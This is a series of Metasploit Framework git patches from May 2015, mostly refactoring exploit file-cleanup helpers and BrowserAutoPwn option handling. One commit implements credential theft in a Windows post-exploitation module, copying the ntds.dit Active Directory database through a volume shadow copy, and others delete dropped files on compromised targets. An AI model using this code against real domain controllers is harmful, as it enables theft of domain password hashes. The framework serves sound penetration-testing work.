From ecb23d09ccd1e086e74f1f68a2048e2966144ed3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 May 2015 15:02:46 -0500
Subject: [PATCH 0063/1013] Do initial fix

---
 lib/msf/core/exploit/file_dropper.rb | 48 +++++++++++++++++++++++++---
 1 file changed, 43 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
index e53803241a..c790abb60b 100644
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -3,6 +3,9 @@
 module Msf
 module Exploit::FileDropper
 
+  include Msf::Post::Common
+  include Msf::Post::File
+
   def initialize(info = {})
     super
 
@@ -22,6 +25,8 @@ module Exploit::FileDropper
   def on_new_session(session)
     super
 
+    @session = session
+
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
     end
@@ -32,6 +37,8 @@ module Exploit::FileDropper
 
     @dropped_files.delete_if do |file|
       win_file = file.gsub("/", "\\\\")
+      exists_before = check_file(file, win_file)
+
       if session.type == "meterpreter"
         begin
           # Meterpreter should do this automatically as part of
@@ -41,10 +48,9 @@ module Exploit::FileDropper
             session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
           end
           session.fs.file.rm(file)
-          print_good("Deleted #{file}")
-          true
+          file_deleted?(file, win_file, exists_before)
         rescue ::Rex::Post::Meterpreter::RequestError
-          false
+          return false
         end
       else
         win_cmds = [
@@ -59,8 +65,7 @@ module Exploit::FileDropper
         # succeed. Doing it this way saves us an extra round-trip.
         # Trick shared by @mihi42
         session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
-        print_good("Deleted #{file}")
-        true
+        file_deleted?(file, win_file, exists_before)
       end
     end
   end
@@ -125,6 +130,39 @@ module Exploit::FileDropper
       print_warning("This exploit may require manual cleanup of '#{f}' on the target")
     end
 
+    private
+
+    def session
+      @session
+    end
+
+    alias :client :session
+
+    def check_file(file, win_file)
+      if session.platform =~ /win/
+        res = file_exist?(win_file)
+      else
+        res = file_exist?(file)
+      end
+
+      res
+    end
+
+    def file_deleted?(file, win_file, exists_before)
+      if exists_before
+        if check_file(file, win_file)
+          print_error("Unable to delete #{file}")
+          false
+        else
+          print_good("Deleted #{file}")
+          true
+        end
+      end
+
+      print_warning("Tried to delete #{file}, unknown result")
+      true
+    end
+
   end
 end
 end

From 3cba27e46156dc62a3d875d0ce1ff5f81f23e6a8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 May 2015 15:03:05 -0500
Subject: [PATCH 0064/1013] Add test case

---
 modules/post/multi/general/delete.rb | 92 ++++++++++++++++++++++++++++
 1 file changed, 92 insertions(+)
 create mode 100644 modules/post/multi/general/delete.rb

diff --git a/modules/post/multi/general/delete.rb b/modules/post/multi/general/delete.rb
new file mode 100644
index 0000000000..04aa95f3e5
--- /dev/null
+++ b/modules/post/multi/general/delete.rb
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'FileDropper code test case',
+      'Description'   => %q{ Test case for issue #4667 },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'juan vazquez' ],
+      'Platform'      => %w{ linux osx unix win java php python },
+      'SessionTypes'  => [ 'shell', 'meterpreter' ]
+    ))
+  end
+
+  def check_file(file, win_file)
+    if session.platform =~ /win/
+      res = file_exist?(win_file)
+    else
+      res = file_exist?(file)
+    end
+
+    res
+  end
+
+  def file_deleted?(file, win_file, exists_before)
+    if exists_before
+      if check_file(file, win_file)
+        print_error("Unable to delete #{file}")
+        false
+      else
+        print_good("Deleted #{file}")
+        true
+      end
+    else
+      print_warning("Tried to delete #{file}, unknown result")
+      true
+    end
+  end
+
+  def run
+    @dropped_files = [
+      '/tmp/test1.txt',
+      '/tmp/test2.txt',
+      '/tmp/test3.txt'
+    ]
+
+    @dropped_files.delete_if do |file|
+      print_status("Trying to delete #{file}... ")
+      win_file = file.gsub("/", "\\\\")
+      exists_before = check_file(file, win_file)
+
+      if session.type == "meterpreter"
+        begin
+          # Meterpreter should do this automatically as part of
+          # fs.file.rm().  Until that has been implemented, remove the
+          # read-only flag with a command.
+          if session.platform =~ /win/
+            session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
+          end
+          session.fs.file.rm(file)
+        rescue ::Rex::Post::Meterpreter::RequestError
+          return false
+        end
+        file_deleted?(file, win_file, exists_before)
+      else
+        win_cmds = [
+          %Q|attrib.exe -r "#{win_file}"|,
+          %Q|del.exe /f /q "#{win_file}"|
+        ]
+        # We need to be platform-independent here. Since we can't be
+        # certain that {#target} is accurate because exploits with
+        # automatic targets frequently change it, we just go ahead and
+        # run both a windows and a unix command in the same line. One
+        # of them will definitely fail and the other will probably
+        # succeed. Doing it this way saves us an extra round-trip.
+        # Trick shared by @mihi42
+        session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
+        file_deleted?(file, win_file, exists_before)
+      end
+    end
+  end
+
+end

From b1dd2a63fc66614662504da68cff715e52d69e0c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 May 2015 17:14:42 -0500
Subject: [PATCH 0065/1013] On new session, check if file has been REALLY
 deleted

---
 lib/msf/core/exploit/file_dropper.rb | 127 +++++++++++++--------------
 1 file changed, 63 insertions(+), 64 deletions(-)

diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
index c790abb60b..2439a6c6b7 100644
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -3,15 +3,12 @@
 module Msf
 module Exploit::FileDropper
 
-  include Msf::Post::Common
-  include Msf::Post::File
-
   def initialize(info = {})
     super
 
     register_advanced_options(
       [
-        OptInt.new( 'FileDropperDelay', [ false, 'Delay in seconds before attempting file cleanup' ])
+        OptInt.new('FileDropperDelay', [false, 'Delay in seconds before attempting file cleanup'])
       ], self.class)
   end
 
@@ -23,12 +20,10 @@ module Exploit::FileDropper
   # @return [void]
   #
   def on_new_session(session)
-    super
+    super(session)
 
-    @session = session
-
-    if session.type == "meterpreter"
-      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
     end
 
     if not @dropped_files or @dropped_files.empty?
@@ -36,36 +31,11 @@ module Exploit::FileDropper
     end
 
     @dropped_files.delete_if do |file|
-      win_file = file.gsub("/", "\\\\")
-      exists_before = check_file(file, win_file)
-
-      if session.type == "meterpreter"
-        begin
-          # Meterpreter should do this automatically as part of
-          # fs.file.rm().  Until that has been implemented, remove the
-          # read-only flag with a command.
-          if session.platform =~ /win/
-            session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
-          end
-          session.fs.file.rm(file)
-          file_deleted?(file, win_file, exists_before)
-        rescue ::Rex::Post::Meterpreter::RequestError
-          return false
-        end
+      exists_before = file_dropper_check_file(file)
+      if file_dropper_delete(file)
+        file_dropper_deleted?(file, exists_before)
       else
-        win_cmds = [
-            %Q|attrib.exe -r "#{win_file}"|,
-            %Q|del.exe /f /q "#{win_file}"|
-        ]
-        # We need to be platform-independent here. Since we can't be
-        # certain that {#target} is accurate because exploits with
-        # automatic targets frequently change it, we just go ahead and
-        # run both a windows and a unix command in the same line. One
-        # of them will definitely fail and the other will probably
-        # succeed. Doing it this way saves us an extra round-trip.
-        # Trick shared by @mihi42
-        session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
-        file_deleted?(file, win_file, exists_before)
+        false
       end
     end
   end
@@ -114,9 +84,8 @@ module Exploit::FileDropper
       @dropped_files.delete_if do |file|
         begin
           file_rm(file)
-          print_good("Deleted #{file}")
-          true
-        #rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE, ::Rex::Post::Meterpreter::RequestError => e
+          # We don't know for sure if file has been deleted, so always warn about it to the user
+          false
         rescue ::Exception => e
           vprint_error("Failed to delete #{file}: #{e}")
           elog("Failed to delete #{file}: #{e.class}: #{e}")
@@ -130,39 +99,69 @@ module Exploit::FileDropper
       print_warning("This exploit may require manual cleanup of '#{f}' on the target")
     end
 
-    private
+  end
 
-    def session
-      @session
-    end
+  private
 
-    alias :client :session
+  def file_dropper_win_file(file)
+    file.gsub('/', "\\\\")
+  end
 
-    def check_file(file, win_file)
-      if session.platform =~ /win/
-        res = file_exist?(win_file)
-      else
-        res = file_exist?(file)
-      end
+  def file_dropper_delete(file)
+    win_file = file_dropper_win_file(file)
 
-      res
-    end
-
-    def file_deleted?(file, win_file, exists_before)
-      if exists_before
-        if check_file(file, win_file)
-          print_error("Unable to delete #{file}")
-          false
-        else
-          print_good("Deleted #{file}")
-          true
+    if session.type == 'meterpreter'
+      begin
+        # Meterpreter should do this automatically as part of
+        # fs.file.rm().  Until that has been implemented, remove the
+        # read-only flag with a command.
+        if session.platform =~ /win/
+          session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
         end
+        session.fs.file.rm(file)
+        true
+      rescue ::Rex::Post::Meterpreter::RequestError
+        false
       end
+    else
+      win_cmds = [
+        %Q|attrib.exe -r "#{win_file}"|,
+        %Q|del.exe /f /q "#{win_file}"|
+      ]
+      # We need to be platform-independent here. Since we can't be
+      # certain that {#target} is accurate because exploits with
+      # automatic targets frequently change it, we just go ahead and
+      # run both a windows and a unix command in the same line. One
+      # of them will definitely fail and the other will probably
+      # succeed. Doing it this way saves us an extra round-trip.
+      # Trick shared by @mihi42
+      session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
+      true
+    end
+  end
 
+  def file_dropper_check_file(file)
+    if session.platform =~ /win/
+      normalized = file_dropper_win_file(file)
+    else
+      normalized = file
+    end
+
+    Msf::Post::File.file_exist?(normalized)
+  end
+
+  def file_dropper_deleted?(file, exists_before)
+    if exists_before  && file_dropper_check_file(file)
+      print_error("Unable to delete #{file}")
+      false
+    elsif exists_before
+      print_good("Deleted #{file}")
+      true
+    else
       print_warning("Tried to delete #{file}, unknown result")
       true
     end
-
   end
+
 end
 end

From a40af79ed9d49cc1996950ede3a3e229e710d304 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 May 2015 17:15:13 -0500
Subject: [PATCH 0066/1013] Delete dummy test case

---
 modules/post/multi/general/delete.rb | 92 ----------------------------
 1 file changed, 92 deletions(-)
 delete mode 100644 modules/post/multi/general/delete.rb

diff --git a/modules/post/multi/general/delete.rb b/modules/post/multi/general/delete.rb
deleted file mode 100644
index 04aa95f3e5..0000000000
--- a/modules/post/multi/general/delete.rb
+++ /dev/null
@@ -1,92 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'rex'
-
-class Metasploit3 < Msf::Post
-
-  include Msf::Post::File
-
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'FileDropper code test case',
-      'Description'   => %q{ Test case for issue #4667 },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'juan vazquez' ],
-      'Platform'      => %w{ linux osx unix win java php python },
-      'SessionTypes'  => [ 'shell', 'meterpreter' ]
-    ))
-  end
-
-  def check_file(file, win_file)
-    if session.platform =~ /win/
-      res = file_exist?(win_file)
-    else
-      res = file_exist?(file)
-    end
-
-    res
-  end
-
-  def file_deleted?(file, win_file, exists_before)
-    if exists_before
-      if check_file(file, win_file)
-        print_error("Unable to delete #{file}")
-        false
-      else
-        print_good("Deleted #{file}")
-        true
-      end
-    else
-      print_warning("Tried to delete #{file}, unknown result")
-      true
-    end
-  end
-
-  def run
-    @dropped_files = [
-      '/tmp/test1.txt',
-      '/tmp/test2.txt',
-      '/tmp/test3.txt'
-    ]
-
-    @dropped_files.delete_if do |file|
-      print_status("Trying to delete #{file}... ")
-      win_file = file.gsub("/", "\\\\")
-      exists_before = check_file(file, win_file)
-
-      if session.type == "meterpreter"
-        begin
-          # Meterpreter should do this automatically as part of
-          # fs.file.rm().  Until that has been implemented, remove the
-          # read-only flag with a command.
-          if session.platform =~ /win/
-            session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
-          end
-          session.fs.file.rm(file)
-        rescue ::Rex::Post::Meterpreter::RequestError
-          return false
-        end
-        file_deleted?(file, win_file, exists_before)
-      else
-        win_cmds = [
-          %Q|attrib.exe -r "#{win_file}"|,
-          %Q|del.exe /f /q "#{win_file}"|
-        ]
-        # We need to be platform-independent here. Since we can't be
-        # certain that {#target} is accurate because exploits with
-        # automatic targets frequently change it, we just go ahead and
-        # run both a windows and a unix command in the same line. One
-        # of them will definitely fail and the other will probably
-        # succeed. Doing it this way saves us an extra round-trip.
-        # Trick shared by @mihi42
-        session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
-        file_deleted?(file, win_file, exists_before)
-      end
-    end
-  end
-
-end

From c5be1933570ba176a87a4b0eb67d4e2c977d37db Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 11 May 2015 18:21:50 -0500
Subject: [PATCH 0067/1013] Maybe put custom content at the bottom?

---
 lib/msf/core/exploit/browserautopwnv2.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 518fbe1fd0..4ee8893dee 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -438,9 +438,9 @@ module Msf
       </script>
       </head>
       <body>
-      #{datastore['Content']}
       </body>
-      </html>|
+      </html>
+      #{datastore['Content']}|
     end
 
   end

From 0fb21af247e074998fa9888aa3f9b2e841a1d2da Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 11 May 2015 18:56:18 -0500
Subject: [PATCH 0068/1013] Verify deletion at on_new_session moment

---
 lib/msf/core/exploit/file_dropper.rb          | 27 ++++++++++++++++++-
 .../http/struts_code_exec_classloader.rb      |  4 +--
 2 files changed, 27 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
index 2439a6c6b7..49a7d49e43 100644
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -3,6 +3,8 @@
 module Msf
 module Exploit::FileDropper
 
+  attr_accessor :session
+
   def initialize(info = {})
     super
 
@@ -20,7 +22,18 @@ module Exploit::FileDropper
   # @return [void]
   #
   def on_new_session(session)
-    super(session)
+    super
+
+    print_status("new session...")
+    on_new_session_job(session)
+  end
+
+  def on_new_session_job(new_session)
+    if session
+      session_orig = session
+    end
+
+    self.session = new_session
 
     if session.type == 'meterpreter'
       session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
@@ -31,6 +44,7 @@ module Exploit::FileDropper
     end
 
     @dropped_files.delete_if do |file|
+      puts "Deleting #{file}"
       exists_before = file_dropper_check_file(file)
       if file_dropper_delete(file)
         file_dropper_deleted?(file, exists_before)
@@ -38,6 +52,12 @@ module Exploit::FileDropper
         false
       end
     end
+
+    if session_orig
+      self.session = session_orig
+    else
+      self.session = nil
+    end
   end
 
   #
@@ -108,6 +128,7 @@ module Exploit::FileDropper
   end
 
   def file_dropper_delete(file)
+    puts "Deleting #{file}"
     win_file = file_dropper_win_file(file)
 
     if session.type == 'meterpreter'
@@ -124,6 +145,7 @@ module Exploit::FileDropper
         false
       end
     else
+      puts "Deleting with shell"
       win_cmds = [
         %Q|attrib.exe -r "#{win_file}"|,
         %Q|del.exe /f /q "#{win_file}"|
@@ -141,16 +163,19 @@ module Exploit::FileDropper
   end
 
   def file_dropper_check_file(file)
+    puts "Checking file... #{file}"
     if session.platform =~ /win/
       normalized = file_dropper_win_file(file)
     else
       normalized = file
     end
 
+    puts "Checking normalized file... #{file}"
     Msf::Post::File.file_exist?(normalized)
   end
 
   def file_dropper_deleted?(file, exists_before)
+    puts "Deleted? ... #{file}"
     if exists_before  && file_dropper_check_file(file)
       print_error("Unable to delete #{file}")
       false
diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index df4a0d0e66..79a444c8dc 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -271,9 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
     end
 
-    # This path depends on CWD. May require manual cleanup
-    # See https://github.com/rapid7/metasploit-framework/issues/4667
-    print_warning("This exploit requires manual cleanup of '#{@jsp_file}' on the target")
+    register_files_for_cleanup(@jsp_file)
 
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")

From 9bba95c2a3ee4901b9ea3b486d5bb9f4c7dfb92a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 12 May 2015 01:47:03 -0500
Subject: [PATCH 0069/1013] Include more options

---
 lib/msf/core/exploit/browserautopwnv2.rb | 20 ++++++++++++--------
 1 file changed, 12 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 4ee8893dee..a8a163890a 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -62,14 +62,18 @@ module Msf
     # @return [void]
     def set_exploit_options(xploit)
       p = select_payload(xploit)
-      xploit.datastore['DisablePayloadHandler'] = true            # BAP should handle the handlers
-      xploit.datastore['PAYLOAD'] = p['payload']                  # We'll need this information later for multi handler
-      xploit.datastore['LPORT']   = p['lport']                    # We'll need this information later for multi handler
-      xploit.datastore['SSL'] = datastore['SSL']                  # Use SSL or not
-      xploit.datastore['SSLVersion'] = datastore['SSLVersion']    # SSL Version
-      xploit.datastore['LHOST'] = get_payload_lhost               # Attacker's IP
-      xploit.datastore['URIPATH'] = "/#{assign_module_resource}"  # A unique resource URI for the exploit
-      xploit.datastore['SRVHOST'] = datastore['SRVHOST']          # Exploit's host
+      xploit.datastore['DisablePayloadHandler'] = true
+      xploit.datastore['PAYLOAD'] = p['payload']
+      xploit.datastore['LPORT']   = p['lport']
+      xploit.datastore['SSL'] = datastore['SSL']
+      xploit.datastore['SSLVersion'] = datastore['SSLVersion']
+      xploit.datastore['LHOST'] = get_payload_lhost
+      xploit.datastore['URIPATH'] = "/#{assign_module_resource}"
+      xploit.datastore['SRVHOST'] = datastore['SRVHOST']
+      xploit.datastore['JsObfuscate'] = datastore['JsObfuscate']
+      xploit.datastore['CookieName'] = datastore['CookieName']
+      xploit.datastore['VERBOSE'] = datastore['VERBOSE']
+      xploit.datastore['Retries'] = datastore['Retries']
       xploit.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2 # Let other mixins know we're in BrowserAutoPwn mode
     end
 

From 605e492781d80ba06e7387e7763971361553cc44 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 12 May 2015 01:55:22 -0500
Subject: [PATCH 0070/1013] Avoid #create if possible

---
 lib/msf/core/exploit/browserautopwnv2.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index a8a163890a..9476df3c2a 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -186,10 +186,10 @@ module Msf
 
     def get_selected_payload_name(platform)
       payload_name = datastore["PAYLOAD_#{platform.upcase}"]
-      p = framework.payloads.create(payload_name)
 
       # The payload is legit, we can use it.
-      return payload_name if p
+      # Avoid #create seems faster
+      return payload_name if framework.payloads.keys.include?(payload_name)
 
       default = DEFAULT_PAYLOADS[platform]['payload']
       print_status("Unknown payload set: #{payload_name}. Falling back to: #{default}.")

From 9fafb645dde78795a0d4ea4a60b513437fb56ae4 Mon Sep 17 00:00:00 2001
From: Samuel Huckins <samuel_huckins@rapid7.com>
Date: Wed, 13 May 2015 09:37:32 -0500
Subject: [PATCH 0071/1013] Updating Rails version comment

---
 lib/metasploit/framework/rails_version_constraint.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/lib/metasploit/framework/rails_version_constraint.rb b/lib/metasploit/framework/rails_version_constraint.rb
index aa75929e45..6258becfb0 100644
--- a/lib/metasploit/framework/rails_version_constraint.rb
+++ b/lib/metasploit/framework/rails_version_constraint.rb
@@ -4,9 +4,8 @@ module Metasploit
   module Framework
     module RailsVersionConstraint
 
-      # The Metasploit ecosystem is not ready for Rails 4 as it uses features of
-      # Rails 3.X that are removed in Rails 4.
+      # The Metasploit ecosystem is not yet ready for Rails 4.1:
       RAILS_VERSION = [ '>= 4.0.9', '< 4.1.0' ]
     end
   end
-end
\ No newline at end of file
+end

From 9308da7956982505c8bc7670f849efbf0afbcdad Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Wed, 13 May 2015 12:25:44 -0500
Subject: [PATCH 0072/1013] 2003 code path working

using VSS directly on server 2003 and repairing
the database with esentutl is now working

MSP-12358
---
 lib/msf/core/post/windows/shadowcopy.rb       | 19 +++++++++
 .../gather/credentials/domain_hashdump.rb     | 40 +++++++++++--------
 2 files changed, 42 insertions(+), 17 deletions(-)

diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb
index 59cb021e94..3f1748b026 100644
--- a/lib/msf/core/post/windows/shadowcopy.rb
+++ b/lib/msf/core/post/windows/shadowcopy.rb
@@ -182,6 +182,25 @@ module ShadowCopy
         return false
       end
     end
+    unless start_swprv
+      return false
+    end
+    return true
+  end
+
+  def start_swprv
+    vss_state = wmic_query('Service where(name="swprv") get state')
+    if vss_state=~ /Running/
+      print_status("Software Shadow Copy service is running.")
+    else
+      print_status("Software Shadow Copy service not running. Starting it now...")
+      if service_restart("swprv", START_TYPE_MANUAL)
+        print_good("Swoftware Shadow Copy started successfully.")
+      else
+        print_error("Insufficient Privs to start service!")
+        return false
+      end
+    end
     return true
   end
 
diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 45783d8257..5ceae0fa22 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -46,24 +46,23 @@ class Metasploit3 < Msf::Post
 
   def copy_database_file
     database_file_path = nil
-    case  sysinfo["OS"]
-      when /2003/
-        database_file_path = vss_method
-      when /2008|2012/
-        database_file_path = ntdsutil_method
-      else
-        print_error "This version of Windows in unsupported"
+    if start_vss
+      case  sysinfo["OS"]
+        when /2003| \.NET/
+          database_file_path = vss_method
+        when /2008|2012/
+          database_file_path = ntdsutil_method
+        else
+          print_error "This version of Windows is unsupported"
+      end
     end
     database_file_path
   end
 
   def is_domain_controller?
     status = false
-    service_list.each do |svc|
-      if svc[:name] == 'NTDS'
-        status = true
-        break
-      end
+    if session.fs.file.exists?('%SystemDrive%\Windows\ntds\ntds.dit')
+      status = true
     end
     status
   end
@@ -77,6 +76,7 @@ class Metasploit3 < Msf::Post
       print_status "NTDS database copied to #{file_path}"
     else
       print_error "There was an error copying the ntds.dit file!"
+      vprint_error result
       file_path = nil
     end
     file_path
@@ -97,10 +97,6 @@ class Metasploit3 < Msf::Post
       print_error "This module requires UAC to be bypassed first"
       status = false
     end
-    if is_system?
-      print_error "Volume Shadow Copy will not work properly as SYSTEM, migrate to a real user"
-      status = false
-    end
     return status
   end
 
@@ -110,7 +106,17 @@ class Metasploit3 < Msf::Post
   end
 
   def vss_method
-
+    id = create_shadowcopy("#{expand_path("%SystemDrive%")}\\")
+    sc_details = get_sc_details(id)
+    sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
+    target_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    copy_command = "/c copy #{sc_path} #{target_path}"
+    result = cmd_exec('cmd.exe', copy_command)
+    if result =~ /1 file\(s\) copied/
+      return target_path
+    else
+      return nil
+    end
   end
 
 end

From a7e265b07eeb67fadaf02ed7f0445a75bc2bc2b8 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 13 May 2015 13:46:06 -0500
Subject: [PATCH 0073/1013] Proper cleanup for notes

---
 lib/msf/core/exploit/browserautopwnv2.rb      | 20 +++++++++++++
 .../exploit/remote/browser_exploit_server.rb  | 28 +++++++++++++++++++
 .../exploit/remote/browser_profile_manager.rb | 11 +++++---
 3 files changed, 55 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 9476df3c2a..f1a616b44e 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -56,6 +56,25 @@ module Msf
       end
     end
 
+    def note_type_prefix
+      @note_type_prefix ||= "BAP.#{Time.now.to_i}.Client"
+    end
+
+    def rm_target_info_notes
+      return unless framework.db.active
+      ::ActiveRecord::Base.connection_pool.with_connection {
+        framework.db.notes.each do |note|
+          if note.ntype.include?(note_type_prefix)
+            note.destroy
+          end
+        end
+      }
+    end
+
+    def cleanup
+      rm_target_info_notes
+    end
+
 
     # Modifies an exploit's default datastore options.
     #
@@ -63,6 +82,7 @@ module Msf
     def set_exploit_options(xploit)
       p = select_payload(xploit)
       xploit.datastore['DisablePayloadHandler'] = true
+      xploit.datastore['NoteTypePrefix'] = note_type_prefix
       xploit.datastore['PAYLOAD'] = p['payload']
       xploit.datastore['LPORT']   = p['lport']
       xploit.datastore['SSL'] = datastore['SSL']
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 6e2edcc9f4..8936473caa 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -111,6 +111,34 @@ module Msf
     end
 
 
+    # This overrides the #note_type_prefix method from Msf::Exploit::Remote::BrowserProfileManager.
+    # There are two way for BES to get this prefix, either:
+    # * It comes from a datastore option. It allows BrowserAutoPwn to share the unique prefix with
+    #   its child exploits, so that these exploits don't have to gather browser information again.
+    # * If the datastore option isn't set, then we assume the user is firing the exploit as a
+    #   standalone so we make somthing more unique, so that if there are two instances using the
+    #   same exploit, they don't actually share info.
+    def note_type_prefix
+      self.datastore['NoteTypePrefix'] || @unique_prefix ||= lambda {
+        "#{self.shortname}.#{Time.now.to_i}.Client"
+      }.call
+    end
+
+    def cleanup
+      # Whoever registered NoteTypePrefix should do the cleanup for notes
+      return if self.datastore['NoteTypePrefix']
+
+      return unless framework.db.active
+      ::ActiveRecord::Base.connection_pool.with_connection {
+        framework.db.notes.each do |note|
+          if note.ntype =~ /^#{self.shortname}\.\d+\.Client/
+            note.destroy
+          end
+        end
+      }
+    end
+
+
     # Returns the custom 404 URL set by the user
     #
     # @return [String]
diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
index 3e295c65de..4408f9886b 100644
--- a/lib/msf/core/exploit/remote/browser_profile_manager.rb
+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -5,10 +5,13 @@ module Msf
 
     public
 
-    NOTE_TYPE_PREFIX = 'BrowserExploitServer.Client'
+    # Default prefix
+    def note_type_prefix
+      raise NoMethodError, "A mixin that's using BrowserProfileManager should define note_type_prefix"
+    end
 
     def get_profile_info(tag)
-      normalized_tag = "#{NOTE_TYPE_PREFIX}.#{tag}"
+      normalized_tag = "#{note_type_prefix}.#{tag}"
       framework.db.notes.each do |note|
         return MessagePack.unpack(note.data) if note.ntype == normalized_tag 
       end
@@ -23,7 +26,7 @@ module Msf
         profile = get_profile_info(tag)
       end
 
-      normalized_tag = "#{NOTE_TYPE_PREFIX}.#{tag}"
+      normalized_tag = "#{note_type_prefix}.#{tag}"
       profile[normalized_tag][key.to_s] = value
       framework.db.report_note(
         :type => normalized_tag,
@@ -33,7 +36,7 @@ module Msf
     end
 
     def init_profile(tag)
-      normalized_tag = "#{NOTE_TYPE_PREFIX}.#{tag}"
+      normalized_tag = "#{note_type_prefix}.#{tag}"
       empty_profile = { normalized_tag => {} }
       framework.db.report_note(
         :type => normalized_tag,

From e4fed019acf24f884189bab3291f504e31cd18b6 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 13 May 2015 13:51:59 -0500
Subject: [PATCH 0074/1013] Hide exploit paths

As an user, you shouldn't be using exploit paths so we hide them
by default.
---
 lib/msf/core/exploit/browserautopwnv2.rb | 22 ++++++++++++++--------
